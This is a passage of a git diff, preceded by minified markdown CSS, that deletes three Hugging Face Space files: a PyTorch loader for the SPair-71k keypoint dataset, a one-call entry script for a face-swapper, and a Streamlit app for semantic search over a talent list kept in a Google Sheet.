(prefers-color-scheme:dark){.markdown-body{color-scheme:dark;--color-prettylights-syntax-comment:#8b949e;--color-prettylights-syntax-constant:#79c0ff;--color-prettylights-syntax-entity:#d2a8ff;--color-prettylights-syntax-storage-modifier-import:#c9d1d9;--color-prettylights-syntax-entity-tag:#7ee787;--color-prettylights-syntax-keyword:#ff7b72;--color-prettylights-syntax-string:#a5d6ff;--color-prettylights-syntax-variable:#ffa657;--color-prettylights-syntax-brackethighlighter-unmatched:#f85149;--color-prettylights-syntax-invalid-illegal-text:#f0f6fc;--color-prettylights-syntax-invalid-illegal-bg:#8e1519;--color-prettylights-syntax-carriage-return-text:#f0f6fc;--color-prettylights-syntax-carriage-return-bg:#b62324;--color-prettylights-syntax-string-regexp:#7ee787;--color-prettylights-syntax-markup-list:#f2cc60;--color-prettylights-syntax-markup-heading:#1f6feb;--color-prettylights-syntax-markup-italic:#c9d1d9;--color-prettylights-syntax-markup-bold:#c9d1d9;--color-prettylights-syntax-markup-deleted-text:#ffdcd7;--color-prettylights-syntax-markup-deleted-bg:#67060c;--color-prettylights-syntax-markup-inserted-text:#aff5b4;--color-prettylights-syntax-markup-inserted-bg:#033a16;--color-prettylights-syntax-markup-changed-text:#ffdfb6;--color-prettylights-syntax-markup-changed-bg:#5a1e02;--color-prettylights-syntax-markup-ignored-text:#c9d1d9;--color-prettylights-syntax-markup-ignored-bg:#1158c7;--color-prettylights-syntax-meta-diff-range:#d2a8ff;--color-prettylights-syntax-brackethighlighter-angle:#8b949e;--color-prettylights-syntax-sublimelinter-gutter-mark:#484f58;--color-prettylights-syntax-constant-other-reference-link:#a5d6ff;--color-fg-default:#c9d1d9;--color-fg-muted:#8b949e;--color-fg-subtle:#6e7681;--color-canvas-default:#0d1117;--color-canvas-subtle:#161b22;--color-border-default:#30363d;--color-border-muted:#21262d;--color-neutral-muted:hsla(215,8%,47%,.4);--color-accent-fg:#58a6ff;--color-accent-emphasis:#1f6feb;--color-attention-subtle:rgba(187,128,9,.15);--color-danger-fg:#f85149}}@media 
(prefers-color-scheme:light){.markdown-body{color-scheme:light;--color-prettylights-syntax-comment:#6e7781;--color-prettylights-syntax-constant:#0550ae;--color-prettylights-syntax-entity:#8250df;--color-prettylights-syntax-storage-modifier-import:#24292f;--color-prettylights-syntax-entity-tag:#116329;--color-prettylights-syntax-keyword:#cf222e;--color-prettylights-syntax-string:#0a3069;--color-prettylights-syntax-variable:#953800;--color-prettylights-syntax-brackethighlighter-unmatched:#82071e;--color-prettylights-syntax-invalid-illegal-text:#f6f8fa;--color-prettylights-syntax-invalid-illegal-bg:#82071e;--color-prettylights-syntax-carriage-return-text:#f6f8fa;--color-prettylights-syntax-carriage-return-bg:#cf222e;--color-prettylights-syntax-string-regexp:#116329;--color-prettylights-syntax-markup-list:#3b2300;--color-prettylights-syntax-markup-heading:#0550ae;--color-prettylights-syntax-markup-italic:#24292f;--color-prettylights-syntax-markup-bold:#24292f;--color-prettylights-syntax-markup-deleted-text:#82071e;--color-prettylights-syntax-markup-deleted-bg:#ffebe9;--color-prettylights-syntax-markup-inserted-text:#116329;--color-prettylights-syntax-markup-inserted-bg:#dafbe1;--color-prettylights-syntax-markup-changed-text:#953800;--color-prettylights-syntax-markup-changed-bg:#ffd8b5;--color-prettylights-syntax-markup-ignored-text:#eaeef2;--color-prettylights-syntax-markup-ignored-bg:#0550ae;--color-prettylights-syntax-meta-diff-range:#8250df;--color-prettylights-syntax-brackethighlighter-angle:#57606a;--color-prettylights-syntax-sublimelinter-gutter-mark:#8c959f;--color-prettylights-syntax-constant-other-reference-link:#0a3069;--color-fg-default:#24292f;--color-fg-muted:#57606a;--color-fg-subtle:#6e7781;--color-canvas-default:#fff;--color-canvas-subtle:#f6f8fa;--color-border-default:#d0d7de;--color-border-muted:#d8dee4;--color-neutral-muted:rgba(175,184,193,.2);--color-accent-fg:#0969da;--color-accent-emphasis:#0969da;--color-attention-subtle:#fff8c5;--color-danger-fg:#cf222e}}.markdown-body{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%;margin:0;color:var(--color-fg-default);background-color:var(--color-canvas-default);font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Noto Sans,Helvetica,Arial,sans-serif,Apple Color Emoji,Segoe UI Emoji;font-size:16px;line-height:1.5;word-wrap:break-word}.markdown-body h1:hover .anchor .octicon-link:before,.markdown-body h2:hover .anchor .octicon-link:before,.markdown-body h3:hover .anchor .octicon-link:before,.markdown-body h4:hover .anchor .octicon-link:before,.markdown-body h5:hover .anchor .octicon-link:before,.markdown-body h6:hover .anchor .octicon-link:before{width:16px;height:16px;content:" ";display:inline-block;background-color:currentColor;-webkit-mask-image:url("data:image/svg+xml,");mask-image:url("data:image/svg+xml,")}.markdown-body details,.markdown-body figcaption,.markdown-body figure{display:block}.markdown-body summary{display:list-item}.markdown-body [hidden]{display:none!important}.markdown-body a{background-color:transparent;color:var(--color-accent-fg);text-decoration:none}.markdown-body abbr[title]{border-bottom:none;-webkit-text-decoration:underline dotted;text-decoration:underline dotted}.markdown-body b,.markdown-body strong{font-weight:var(--base-text-weight-semibold,600)}.markdown-body dfn{font-style:italic}.markdown-body h1{margin:.67em 0;font-weight:var(--base-text-weight-semibold,600);padding-bottom:.3em;font-size:2em;border-bottom:1px solid var(--color-border-muted)}.markdown-body 
mark{background-color:var(--color-attention-subtle);color:var(--color-fg-default)}.markdown-body small{font-size:90%}.markdown-body sub,.markdown-body sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}.markdown-body sub{bottom:-.25em}.markdown-body sup{top:-.5em}.markdown-body img{border-style:none;max-width:100%;box-sizing:content-box;background-color:var(--color-canvas-default)}.markdown-body code,.markdown-body kbd,.markdown-body pre,.markdown-body samp{font-family:monospace;font-size:1em}.markdown-body figure{margin:1em 40px}.markdown-body hr{box-sizing:content-box;overflow:hidden;background:transparent;height:.25em;padding:0;margin:24px 0;background-color:var(--color-border-default);border:0}.markdown-body input{font:inherit;margin:0;overflow:visible;font-family:inherit;font-size:inherit;line-height:inherit}.markdown-body [type=button],.markdown-body [type=reset],.markdown-body [type=submit]{-webkit-appearance:button}.markdown-body [type=checkbox],.markdown-body [type=radio]{box-sizing:border-box;padding:0}.markdown-body [type=number]::-webkit-inner-spin-button,.markdown-body [type=number]::-webkit-outer-spin-button{height:auto}.markdown-body [type=search]::-webkit-search-cancel-button,.markdown-body [type=search]::-webkit-search-decoration{-webkit-appearance:none}.markdown-body ::-webkit-input-placeholder{color:inherit;opacity:.54}.markdown-body ::-webkit-file-upload-button{-webkit-appearance:button;font:inherit}.markdown-body a:hover{text-decoration:underline}.markdown-body ::-moz-placeholder{color:var(--color-fg-subtle);opacity:1}.markdown-body ::placeholder{color:var(--color-fg-subtle);opacity:1}.markdown-body hr:after,.markdown-body hr:before{display:table;content:""}.markdown-body hr:after{clear:both}.markdown-body table{border-spacing:0;border-collapse:collapse;display:block;width:-moz-max-content;width:max-content;max-width:100%;overflow:auto}.markdown-body td,.markdown-body th{padding:0}.markdown-body details summary{cursor:pointer}.markdown-body details:not([open])>:not(summary){display:none!important}.markdown-body [role=button]:focus,.markdown-body a:focus,.markdown-body input[type=checkbox]:focus,.markdown-body input[type=radio]:focus{outline:2px solid var(--color-accent-fg);outline-offset:-2px;box-shadow:none}.markdown-body [role=button]:focus:not(:focus-visible),.markdown-body a:focus:not(:focus-visible),.markdown-body input[type=checkbox]:focus:not(:focus-visible),.markdown-body input[type=radio]:focus:not(:focus-visible){outline:1px solid transparent}.markdown-body [role=button]:focus-visible,.markdown-body a:focus-visible,.markdown-body input[type=checkbox]:focus-visible,.markdown-body input[type=radio]:focus-visible{outline:2px solid var(--color-accent-fg);outline-offset:-2px;box-shadow:none}.markdown-body a:not([class]):focus,.markdown-body a:not([class]):focus-visible,.markdown-body input[type=checkbox]:focus,.markdown-body input[type=checkbox]:focus-visible,.markdown-body input[type=radio]:focus,.markdown-body input[type=radio]:focus-visible{outline-offset:0}.markdown-body kbd{display:inline-block;padding:3px 5px;font:11px ui-monospace,SFMono-Regular,SF Mono,Menlo,Consolas,Liberation Mono,monospace;line-height:10px;color:var(--color-fg-default);vertical-align:middle;background-color:var(--color-canvas-subtle);border-bottom-color:var(--color-neutral-muted);border:1px solid var(--color-neutral-muted);border-radius:6px;box-shadow:inset 0 -1px 0 var(--color-neutral-muted)}.markdown-body h1,.markdown-body h2,.markdown-body h3,.markdown-body 
h4,.markdown-body h5,.markdown-body h6{margin-top:24px;margin-bottom:16px;font-weight:var(--base-text-weight-semibold,600);line-height:1.25}.markdown-body h2{padding-bottom:.3em;font-size:1.5em;border-bottom:1px solid var(--color-border-muted)}.markdown-body h2,.markdown-body h3{font-weight:var(--base-text-weight-semibold,600)}.markdown-body h3{font-size:1.25em}.markdown-body h4{font-size:1em}.markdown-body h4,.markdown-body h5{font-weight:var(--base-text-weight-semibold,600)}.markdown-body h5{font-size:.875em}.markdown-body h6{font-weight:var(--base-text-weight-semibold,600);font-size:.85em;color:var(--color-fg-muted)}.markdown-body p{margin-top:0;margin-bottom:10px}.markdown-body blockquote{margin:0;padding:0 1em;color:var(--color-fg-muted);border-left:.25em solid var(--color-border-default)}.markdown-body ol,.markdown-body ul{margin-top:0;margin-bottom:0;padding-left:2em}.markdown-body ol ol,.markdown-body ul ol{list-style-type:lower-roman}.markdown-body ol ol ol,.markdown-body ol ul ol,.markdown-body ul ol ol,.markdown-body ul ul ol{list-style-type:lower-alpha}.markdown-body dd{margin-left:0}.markdown-body code,.markdown-body pre,.markdown-body samp,.markdown-body tt{font-family:ui-monospace,SFMono-Regular,SF Mono,Menlo,Consolas,Liberation Mono,monospace;font-size:12px}.markdown-body pre{margin-top:0;margin-bottom:0;word-wrap:normal}.markdown-body .octicon{display:inline-block;overflow:visible!important;vertical-align:text-bottom;fill:currentColor}.markdown-body input::-webkit-inner-spin-button,.markdown-body input::-webkit-outer-spin-button{margin:0;-webkit-appearance:none;appearance:none}.markdown-body:after,.markdown-body:before{display:table;content:""}.markdown-body:after{clear:both}.markdown-body>:first-child{margin-top:0!important}.markdown-body>:last-child{margin-bottom:0!important}.markdown-body a:not([href]){color:inherit;text-decoration:none}.markdown-body .absent{color:var(--color-danger-fg)}.markdown-body .anchor{float:left;padding-right:4px;margin-left:-20px;line-height:1}.markdown-body .anchor:focus{outline:none}.markdown-body blockquote,.markdown-body details,.markdown-body dl,.markdown-body ol,.markdown-body p,.markdown-body pre,.markdown-body table,.markdown-body ul{margin-top:0;margin-bottom:16px}.markdown-body blockquote>:first-child{margin-top:0}.markdown-body blockquote>:last-child{margin-bottom:0}.markdown-body h1 .octicon-link,.markdown-body h2 .octicon-link,.markdown-body h3 .octicon-link,.markdown-body h4 .octicon-link,.markdown-body h5 .octicon-link,.markdown-body h6 .octicon-link{color:var(--color-fg-default);vertical-align:middle;visibility:hidden}.markdown-body h1:hover .anchor,.markdown-body h2:hover .anchor,.markdown-body h3:hover .anchor,.markdown-body h4:hover .anchor,.markdown-body h5:hover .anchor,.markdown-body h6:hover .anchor{text-decoration:none}.markdown-body h1:hover .anchor .octicon-link,.markdown-body h2:hover .anchor .octicon-link,.markdown-body h3:hover .anchor .octicon-link,.markdown-body h4:hover .anchor .octicon-link,.markdown-body h5:hover .anchor .octicon-link,.markdown-body h6:hover .anchor .octicon-link{visibility:visible}.markdown-body h1 code,.markdown-body h1 tt,.markdown-body h2 code,.markdown-body h2 tt,.markdown-body h3 code,.markdown-body h3 tt,.markdown-body h4 code,.markdown-body h4 tt,.markdown-body h5 code,.markdown-body h5 tt,.markdown-body h6 code,.markdown-body h6 tt{padding:0 .2em;font-size:inherit}.markdown-body summary h1,.markdown-body summary h2,.markdown-body summary h3,.markdown-body summary h4,.markdown-body 
summary h5,.markdown-body summary h6{display:inline-block}.markdown-body summary h1 .anchor,.markdown-body summary h2 .anchor,.markdown-body summary h3 .anchor,.markdown-body summary h4 .anchor,.markdown-body summary h5 .anchor,.markdown-body summary h6 .anchor{margin-left:-40px}.markdown-body summary h1,.markdown-body summary h2{padding-bottom:0;border-bottom:0}.markdown-body ol.no-list,.markdown-body ul.no-list{padding:0;list-style-type:none}.markdown-body ol[type=a]{list-style-type:lower-alpha}.markdown-body ol[type=A]{list-style-type:upper-alpha}.markdown-body ol[type=i]{list-style-type:lower-roman}.markdown-body ol[type=I]{list-style-type:upper-roman}.markdown-body div>ol:not([type]),.markdown-body ol[type="1"]{list-style-type:decimal}.markdown-body ol ol,.markdown-body ol ul,.markdown-body ul ol,.markdown-body ul ul{margin-top:0;margin-bottom:0}.markdown-body li>p{margin-top:16px}.markdown-body li+li{margin-top:.25em}.markdown-body dl{padding:0}.markdown-body dl dt{padding:0;margin-top:16px;font-size:1em;font-style:italic;font-weight:var(--base-text-weight-semibold,600)}.markdown-body dl dd{padding:0 16px;margin-bottom:16px}.markdown-body table th{font-weight:var(--base-text-weight-semibold,600)}.markdown-body table td,.markdown-body table th{padding:6px 13px;border:1px solid var(--color-border-default)}.markdown-body table tr{background-color:var(--color-canvas-default);border-top:1px solid var(--color-border-muted)}.markdown-body table tr:nth-child(2n){background-color:var(--color-canvas-subtle)}.markdown-body table img{background-color:transparent}.markdown-body img[align=right]{padding-left:20px}.markdown-body img[align=left]{padding-right:20px}.markdown-body .emoji{max-width:none;vertical-align:text-top;background-color:transparent}.markdown-body span.frame{display:block;overflow:hidden}.markdown-body span.frame>span{display:block;float:left;width:auto;padding:7px;margin:13px 0 0;overflow:hidden;border:1px solid var(--color-border-default)}.markdown-body span.frame span img{display:block;float:left}.markdown-body span.frame span span{display:block;padding:5px 0 0;clear:both;color:var(--color-fg-default)}.markdown-body span.align-center{display:block;overflow:hidden;clear:both}.markdown-body span.align-center>span{display:block;margin:13px auto 0;overflow:hidden;text-align:center}.markdown-body span.align-center span img{margin:0 auto;text-align:center}.markdown-body span.align-right{display:block;overflow:hidden;clear:both}.markdown-body span.align-right>span{display:block;margin:13px 0 0;overflow:hidden;text-align:right}.markdown-body span.align-right span img{margin:0;text-align:right}.markdown-body span.float-left{display:block;float:left;margin-right:13px;overflow:hidden}.markdown-body span.float-left span{margin:13px 0 0}.markdown-body span.float-right{display:block;float:right;margin-left:13px;overflow:hidden}.markdown-body span.float-right>span{display:block;margin:13px auto 0;overflow:hidden;text-align:right}.markdown-body code,.markdown-body tt{padding:.2em .4em;margin:0;font-size:85%;white-space:break-spaces;background-color:var(--color-neutral-muted);border-radius:6px}.markdown-body code br,.markdown-body tt br{display:none}.markdown-body del code{text-decoration:inherit}.markdown-body samp{font-size:85%}.markdown-body pre code{font-size:100%}.markdown-body pre>code{padding:0;margin:0;word-break:normal;white-space:pre;background:transparent;border:0}.markdown-body .highlight{margin-bottom:16px}.markdown-body .highlight 
pre{margin-bottom:0;word-break:normal}.markdown-body .highlight pre,.markdown-body pre{padding:16px;overflow:auto;font-size:85%;line-height:1.45;background-color:var(--color-canvas-subtle);border-radius:6px}.markdown-body pre code,.markdown-body pre tt{display:inline;max-width:auto;padding:0;margin:0;overflow:visible;line-height:inherit;word-wrap:normal;background-color:transparent;border:0}.markdown-body .csv-data td,.markdown-body .csv-data th{padding:5px;overflow:hidden;font-size:12px;line-height:1;text-align:left;white-space:nowrap}.markdown-body .csv-data .blob-num{padding:10px 8px 9px;text-align:right;background:var(--color-canvas-default);border:0}.markdown-body .csv-data tr{border-top:0}.markdown-body .csv-data th{font-weight:var(--base-text-weight-semibold,600);background:var(--color-canvas-subtle);border-top:0}.markdown-body [data-footnote-ref]:before{content:"["}.markdown-body [data-footnote-ref]:after{content:"]"}.markdown-body .footnotes{font-size:12px;color:var(--color-fg-muted);border-top:1px solid var(--color-border-default)}.markdown-body .footnotes ol{padding-left:16px}.markdown-body .footnotes ol ul{display:inline-block;padding-left:16px;margin-top:16px}.markdown-body .footnotes li{position:relative}.markdown-body .footnotes li:target:before{position:absolute;top:-8px;right:-8px;bottom:-8px;left:-24px;pointer-events:none;content:"";border:2px solid var(--color-accent-emphasis);border-radius:6px}.markdown-body .footnotes li:target{color:var(--color-fg-default)}.markdown-body .footnotes .data-footnote-backref g-emoji{font-family:monospace}.markdown-body .pl-c{color:var(--color-prettylights-syntax-comment)}.markdown-body .pl-c1,.markdown-body .pl-s .pl-v{color:var(--color-prettylights-syntax-constant)}.markdown-body .pl-e,.markdown-body .pl-en{color:var(--color-prettylights-syntax-entity)}.markdown-body .pl-s .pl-s1,.markdown-body .pl-smi{color:var(--color-prettylights-syntax-storage-modifier-import)}.markdown-body .pl-ent{color:var(--color-prettylights-syntax-entity-tag)}.markdown-body .pl-k{color:var(--color-prettylights-syntax-keyword)}.markdown-body .pl-pds,.markdown-body .pl-s,.markdown-body .pl-s .pl-pse .pl-s1,.markdown-body .pl-sr,.markdown-body .pl-sr .pl-cce,.markdown-body .pl-sr .pl-sra,.markdown-body .pl-sr .pl-sre{color:var(--color-prettylights-syntax-string)}.markdown-body .pl-smw,.markdown-body .pl-v{color:var(--color-prettylights-syntax-variable)}.markdown-body .pl-bu{color:var(--color-prettylights-syntax-brackethighlighter-unmatched)}.markdown-body .pl-ii{color:var(--color-prettylights-syntax-invalid-illegal-text);background-color:var(--color-prettylights-syntax-invalid-illegal-bg)}.markdown-body .pl-c2{color:var(--color-prettylights-syntax-carriage-return-text);background-color:var(--color-prettylights-syntax-carriage-return-bg)}.markdown-body .pl-sr .pl-cce{font-weight:700;color:var(--color-prettylights-syntax-string-regexp)}.markdown-body .pl-ml{color:var(--color-prettylights-syntax-markup-list)}.markdown-body .pl-mh,.markdown-body .pl-mh .pl-en,.markdown-body .pl-ms{font-weight:700;color:var(--color-prettylights-syntax-markup-heading)}.markdown-body .pl-mi{font-style:italic;color:var(--color-prettylights-syntax-markup-italic)}.markdown-body .pl-mb{font-weight:700;color:var(--color-prettylights-syntax-markup-bold)}.markdown-body .pl-md{color:var(--color-prettylights-syntax-markup-deleted-text);background-color:var(--color-prettylights-syntax-markup-deleted-bg)}.markdown-body 
.pl-mi1{color:var(--color-prettylights-syntax-markup-inserted-text);background-color:var(--color-prettylights-syntax-markup-inserted-bg)}.markdown-body .pl-mc{color:var(--color-prettylights-syntax-markup-changed-text);background-color:var(--color-prettylights-syntax-markup-changed-bg)}.markdown-body .pl-mi2{color:var(--color-prettylights-syntax-markup-ignored-text);background-color:var(--color-prettylights-syntax-markup-ignored-bg)}.markdown-body .pl-mdr{font-weight:700;color:var(--color-prettylights-syntax-meta-diff-range)}.markdown-body .pl-ba{color:var(--color-prettylights-syntax-brackethighlighter-angle)}.markdown-body .pl-sg{color:var(--color-prettylights-syntax-sublimelinter-gutter-mark)}.markdown-body .pl-corl{text-decoration:underline;color:var(--color-prettylights-syntax-constant-other-reference-link)}.markdown-body g-emoji{display:inline-block;min-width:1ch;font-family:Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol;font-size:1em;font-style:normal!important;font-weight:var(--base-text-weight-normal,400);line-height:1;vertical-align:-.075em}.markdown-body g-emoji img{width:1em;height:1em}.markdown-body .task-list-item{list-style-type:none}.markdown-body .task-list-item label{font-weight:var(--base-text-weight-normal,400)}.markdown-body .task-list-item.enabled label{cursor:pointer}.markdown-body .task-list-item+.task-list-item{margin-top:4px}.markdown-body .task-list-item .handle{display:none}.markdown-body .task-list-item-checkbox{margin:0 .2em .25em -1.4em;vertical-align:middle}.markdown-body .contains-task-list:dir(rtl) .task-list-item-checkbox{margin:0 -1.6em .25em .2em}.markdown-body .contains-task-list{position:relative}.markdown-body .contains-task-list:focus-within .task-list-item-convert-container,.markdown-body .contains-task-list:hover .task-list-item-convert-container{display:block;width:auto;height:24px;overflow:visible;clip:auto}.markdown-body ::-webkit-calendar-picker-indicator{filter:invert(50%)}.markdown-custom-styles{color:inherit;background-color:transparent;>p,>ul,ol{margin-bottom:5px}>ul,ol{list-style:disc;padding-left:1em}& li p{margin-top:5px;margin-bottom:5px}& pre{padding:0;margin-top:10px;margin-bottom:10px}& pre code{white-space:pre-wrap;padding:10px}& img{max-width:min(80%,300px);margin-top:5px}& a:not(:has(sup)){color:inherit;text-decoration:underline}} \ No newline at end of file diff --git a/spaces/taesiri/ConvolutionalHoughMatchingNetworks/data/spair.py b/spaces/taesiri/ConvolutionalHoughMatchingNetworks/data/spair.py deleted file mode 100644 index 027bc8a654d8bf8f2799df47fdbba7f66142eeb8..0000000000000000000000000000000000000000 --- a/spaces/taesiri/ConvolutionalHoughMatchingNetworks/data/spair.py +++ /dev/null @@ -1,105 +0,0 @@ -r""" SPair-71k dataset """ - -import json -import glob -import os - -import torch.nn.functional as F -import torch -from PIL import Image -import numpy as np - -from .dataset import CorrespondenceDataset - - -class SPairDataset(CorrespondenceDataset): - - def __init__(self, benchmark, datapath, thres, split): - r""" SPair-71k dataset constructor """ - super(SPairDataset, self).__init__(benchmark, datapath, thres, split) - - self.train_data = open(self.spt_path).read().split('\n') - self.train_data = self.train_data[:len(self.train_data) - 1] - self.src_imnames = list(map(lambda x: x.split('-')[1] + '.jpg', self.train_data)) - self.trg_imnames = list(map(lambda x: x.split('-')[2].split(':')[0] + '.jpg', self.train_data)) - self.seg_path = os.path.abspath(os.path.join(self.img_path, os.pardir, 'Segmentation')) - self.cls = 
os.listdir(self.img_path) - self.cls.sort() - - anntn_files = [] - for data_name in self.train_data: - anntn_files.append(glob.glob('%s/%s.json' % (self.ann_path, data_name))[0]) - anntn_files = list(map(lambda x: json.load(open(x)), anntn_files)) - self.src_kps = list(map(lambda x: torch.tensor(x['src_kps']).t().float(), anntn_files)) - self.trg_kps = list(map(lambda x: torch.tensor(x['trg_kps']).t().float(), anntn_files)) - self.src_bbox = list(map(lambda x: torch.tensor(x['src_bndbox']).float(), anntn_files)) - self.trg_bbox = list(map(lambda x: torch.tensor(x['trg_bndbox']).float(), anntn_files)) - self.cls_ids = list(map(lambda x: self.cls.index(x['category']), anntn_files)) - - self.vpvar = list(map(lambda x: torch.tensor(x['viewpoint_variation']), anntn_files)) - self.scvar = list(map(lambda x: torch.tensor(x['scale_variation']), anntn_files)) - self.trncn = list(map(lambda x: torch.tensor(x['truncation']), anntn_files)) - self.occln = list(map(lambda x: torch.tensor(x['occlusion']), anntn_files)) - - def __getitem__(self, idx): - r""" Construct and return a batch for SPair-71k dataset """ - sample = super(SPairDataset, self).__getitem__(idx) - - sample['src_mask'] = self.get_mask(sample, sample['src_imname']) - sample['trg_mask'] = self.get_mask(sample, sample['trg_imname']) - - sample['src_bbox'] = self.get_bbox(self.src_bbox, idx, sample['src_imsize']) - sample['trg_bbox'] = self.get_bbox(self.trg_bbox, idx, sample['trg_imsize']) - sample['pckthres'] = self.get_pckthres(sample, sample['trg_imsize']) - - sample['vpvar'] = self.vpvar[idx] - sample['scvar'] = self.scvar[idx] - sample['trncn'] = self.trncn[idx] - sample['occln'] = self.occln[idx] - - return sample - - def get_mask(self, sample, imname): - mask_path = os.path.join(self.seg_path, sample['category'], imname.split('.')[0] + '.png') - - tensor_mask = torch.tensor(np.array(Image.open(mask_path))) - - class_dict = {'aeroplane': 0, 'bicycle': 1, 'bird': 2, 'boat': 3, 'bottle': 4, - 'bus': 5, 'car': 6, 'cat': 7, 'chair': 8, 'cow': 9, - 'diningtable': 10, 'dog': 11, 'horse': 12, 'motorbike': 13, 'person': 14, - 'pottedplant': 15, 'sheep': 16, 'sofa': 17, 'train': 18, 'tvmonitor': 19} - - class_id = class_dict[sample['category']] + 1 - tensor_mask[tensor_mask != class_id] = 0 - tensor_mask[tensor_mask == class_id] = 255 - - tensor_mask = F.interpolate(tensor_mask.unsqueeze(0).unsqueeze(0).float(), - size=(self.img_size, self.img_size), - mode='bilinear', align_corners=True).int().squeeze() - - return tensor_mask - - def get_image(self, img_names, idx): - r""" Return image tensor """ - path = os.path.join(self.img_path, self.cls[self.cls_ids[idx]], img_names[idx]) - - return Image.open(path).convert('RGB') - - def get_pckthres(self, sample, imsize): - r""" Compute PCK threshold """ - return super(SPairDataset, self).get_pckthres(sample, imsize) - - def get_points(self, pts_list, idx, imsize): - r""" Return key-points of an image """ - return super(SPairDataset, self).get_points(pts_list, idx, imsize) - - def match_idx(self, kps, n_pts): - r""" Sample the nearst feature (receptive field) indices """ - return super(SPairDataset, self).match_idx(kps, n_pts) - - def get_bbox(self, bbox_list, idx, imsize): - r""" Return object bounding-box """ - bbox = bbox_list[idx].clone() - bbox[0::2] *= (self.img_size / imsize[0]) - bbox[1::2] *= (self.img_size / imsize[1]) - return bbox diff --git a/spaces/talhaty/Faceswapper/run.py b/spaces/talhaty/Faceswapper/run.py deleted file mode 100644 index 
b52e5cc4a8ea9ce5cadd4e7111fb15531f380314..0000000000000000000000000000000000000000 --- a/spaces/talhaty/Faceswapper/run.py +++ /dev/null @@ -1,6 +0,0 @@ -#!/usr/bin/env python3 - -from roop import core - -if __name__ == '__main__': - core.run() diff --git a/spaces/temandata/ecommurz-talent-search-engine/app.py b/spaces/temandata/ecommurz-talent-search-engine/app.py deleted file mode 100644 index d71e873430d8f2efefdb8247a1cd9d920ed32aa3..0000000000000000000000000000000000000000 --- a/spaces/temandata/ecommurz-talent-search-engine/app.py +++ /dev/null @@ -1,179 +0,0 @@ -from typing import List - -import numpy as np -import pandas as pd -import streamlit as st -from sentence_transformers import SentenceTransformer, util -from st_aggrid import AgGrid, GridOptionsBuilder, JsCode - -st.set_page_config(layout='wide') - -@st.cache(allow_output_mutation=True) -def load_model(): - """Load pretrained model from SentenceTransformer""" - return SentenceTransformer('minilm_sbert') - -def semantic_search(model: SentenceTransformer, - query: str, - corpus_embeddings: List) -> pd.DataFrame: - """Perform semantic search on the corpus""" - query_embeddings = model.encode(sentences=query, - batch_size=128, - show_progress_bar=False, - convert_to_tensor=True, - normalize_embeddings=True) - - hits = util.semantic_search(query_embeddings, - corpus_embeddings, - top_k=len(corpus_embeddings), - score_function=util.dot_score) - - return pd.DataFrame(hits[0]) - -def get_similarity_score(model: SentenceTransformer, - data: pd.DataFrame, - query: str, - corpus_embeddings: List) -> pd.DataFrame: - """Get similarity score for each data point and sort by similarity score and last day""" - hits = semantic_search(model, query, corpus_embeddings) - result = pd.merge(data, hits, left_on='ID', right_on='corpus_id') - result['Last Day'] = pd.to_datetime(result['Last Day'], format='%d/%m/%Y', errors='coerce').dt.date - result.sort_values(by=['score', 'Last Day'], ascending=[False, True], inplace=True) - return result - -@st.cache(ttl=2*3600) -def create_embedding(model: SentenceTransformer, - data: pd.DataFrame, - key: str) -> List: - "Maps job title from the corpus to a 384 dimensional vector embeddings" - corpus_sentences = data[key].astype(str).tolist() - corpus_embeddings = model.encode(sentences=corpus_sentences, - batch_size=128, - show_progress_bar=False, - convert_to_tensor=True, - normalize_embeddings=True) - return corpus_embeddings - -def load_dataset(columns: List[str]) -> pd.DataFrame: - """Load real-time dataset from google sheets""" - sheet_id = '1KeuPPVw9gueNmMrQXk1uGFlY9H1vvhErMLiX_ZVRv_Y' - sheet_name = 'Form Response 3'.replace(' ', '%20') - url = f'https://docs.google.com/spreadsheets/d/{sheet_id}/gviz/tq?tqx=out:csv&sheet={sheet_name}' - data = pd.read_csv(url) - data = data.iloc[: , :7] - data.columns = columns - data.insert(0, 'ID', range(len(data))) - data['Full Name'] = data['Full Name'].str.title() - data['LinkedIn Profile'] = data['LinkedIn Profile'].str.lower() - data['LinkedIn Profile'] = np.where(data['LinkedIn Profile'].str.startswith('www.linkedin.com'), - "https://" + data['LinkedIn Profile'], - data['LinkedIn Profile']) - data['LinkedIn Profile'] = np.where(data['LinkedIn Profile'].str.startswith('linkedin.com'), - "https://www." 
+ data['LinkedIn Profile'], - data['LinkedIn Profile']) - return data - -def show_aggrid_table(result: pd.DataFrame): - """Show interactive table from similarity result""" - gb = GridOptionsBuilder.from_dataframe(result) - gb.configure_pagination(paginationAutoPageSize=True) - gb.configure_side_bar() - gb.configure_default_column(min_column_width=200) - gb.configure_selection('multiple', use_checkbox=True, groupSelectsChildren="Group checkbox select children") - gb.configure_column(field='LinkedIn Profile', - headerName='LinkedIn Profile', - cellRenderer=JsCode('''function(params) {return `${params.value}`}''')) - - grid_options = gb.build() - - grid_response = AgGrid( - dataframe=result, - gridOptions=grid_options, - height=1100, - fit_columns_on_grid_load=True, - data_return_mode='AS_INPUT', - update_mode='VALUE_CHANGED', - theme='light', - enable_enterprise_modules=True, - allow_unsafe_jscode=True, - ) - -def show_heading(): - """Show heading made using streamlit""" - st.title('@ecommurz Talent Search Engine') - st.markdown(''' -
      - - [![Maintainer](https://img.shields.io/badge/maintainer-temandata-blue)](https://temandata.com/) - [![Open Source? Yes!](https://badgen.net/badge/Open%20Source%20%3F/Yes%21/blue?icon=github)](https://github.com/teman-data/ecommurz-talent-search-engine) - ![visitor badge](https://visitor-badge.glitch.me/badge?page_id=temandata_ecommurz-talent-search-engine) - -
      - ''', unsafe_allow_html=True) - st.write('This app lets you search and sort talent by job title or relevant job descriptions from ecommurz talent list in real-time.') - -def get_specific_category(model, data, category, corpus_embeddings): - """Get specific category with confidence score > 0.45""" - data = get_similarity_score(model, data, category, corpus_embeddings) - return data[data['score'] > 0.45].shape[0] - -def main(): - """Main Function""" - show_heading() - - columns = ['Timestamp', 'Full Name', 'Company', 'Previous Role', - 'Experience (months)', 'Last Day', 'LinkedIn Profile'] - data = load_dataset(columns) - model = load_model() - corpus_embeddings = create_embedding(model, data, 'Previous Role') - col1, col2, col3, col4, col5, col6, col7, _ = st.columns([1.1, 1.3, 1.6, 1.65, 1.7, 2.1, 2.25, 9]) - - with col1: - data_count = get_specific_category(model, data, 'data', corpus_embeddings) - data_bt = st.button(f'Data ({data_count})') - with col2: - finance_count = get_specific_category(model, data, 'finance', corpus_embeddings) - finance_bt = st.button(f'Finance ({finance_count})') - with col3: - marketing_count = 